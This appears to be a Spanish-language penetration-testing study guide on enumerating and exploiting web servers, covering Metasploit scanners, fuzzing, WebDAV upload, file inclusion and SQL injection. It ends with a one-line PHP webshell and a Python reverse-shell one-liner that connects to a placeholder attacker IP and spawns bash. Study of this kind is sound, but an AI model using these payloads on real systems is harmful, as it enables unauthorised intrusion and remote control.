Appearance
🌐 HTTP (Hypertext Transfer Protocol)
El protocolo HTTP (puertos 80, 443, 8080) es probablemente la superficie de ataque más extensa en cualquier auditoría. A menudo, una mala configuración en el servidor web o una aplicación desactualizada son la puerta de entrada para obtener una shell inicial.
🔍 Enumeración Web
La fase de enumeración busca identificar qué tecnologías corren en el servidor y encontrar directorios o archivos que no deberían ser públicos (backups, paneles de administración, archivos de configuración).
1. Identificación de Tecnologías
Antes de atacar, debemos saber qué hay detrás.
- Wappalyzer: Extensión de navegador esencial para identificar CMS, lenguajes y servidores.
- WhatWeb: Herramienta de terminal para identificar el "stack" tecnológico.
bash
whatweb http://<IP>2. Automatización con Metasploit
Metasploit ofrece escáneres auxiliares muy potentes para agilizar el reconocimiento:
Versión y Cabeceras:
auxiliary/scanner/http/http_versionyhttp_header. Permiten identificar el servidor (Apache, Nginx, IIS) y posibles protecciones.Robots.txt:
auxiliary/scanner/http/robots_txt. Busca automáticamente este archivo para ver qué directorios el administrador intenta ocultar de los buscadores.Fuerza Bruta de Directorios y Archivos:
auxiliary/scanner/http/dir_scanner(Directorios).auxiliary/scanner/http/files_dir(Archivos específicos).Enumeración de Usuarios:
auxiliary/scanner/http/apache_userdir_enum(Específico para Apache).
3. Fuzzing y Diccionarios (Fuera de MSF)
Aunque Metasploit tiene módulos, herramientas como Dirsearch, Gobuster o FFUF suelen ser más rápidas para descubrir contenido oculto.
🚀 Explotación
Una vez identificada la tecnología y los puntos de entrada, la explotación suele dividirse en dos grandes grupos:
A. Vulnerabilidades del Servidor (Software)
Se basan en fallos del propio servidor web (Apache, IIS) o de sus componentes (PHP, Python).
- CVEs Específicos: Si encuentras una versión antigua (ej: Shellshock en CGI o MS15-034 en IIS), busca el exploit correspondiente en Metasploit.
- WebDAV: Si el método
PUTestá habilitado, puedes subir una WebShell directamente:
bash
# Usando el módulo de Metasploit
use exploit/windows/http/iis_webdav_upload_aspB. Vulnerabilidades de la Aplicación (Lógica/Código)
Son fallos en el código de la web que permiten interactuar con el servidor.
- Carga de Archivos (File Upload): Subir un archivo
.phpo.aspxmalicioso para obtener una reverse shell. - LFI/RFI (File Inclusion): Leer archivos del sistema (como
/etc/passwd) o ejecutar código remoto. - SQL Injection (SQLi): Extraer la base de datos o, en algunos casos, obtener ejecución de comandos (RCE) mediante
xp_cmdshellen MSSQL.
🚪 WebShells y el salto a la Shell
Si logras subir un archivo malicioso, el siguiente paso es ejecutar comandos.
- Subes
cmd.php(ejemplo:<?php system($_GET['cmd']); ?>). - Accedes vía navegador:
http://<IP>/cmd.php?cmd=whoami. - Estableces una Reverse Shell para salir del navegador y tener una terminal real:
bash
# Payload para la URL
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<TU_IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'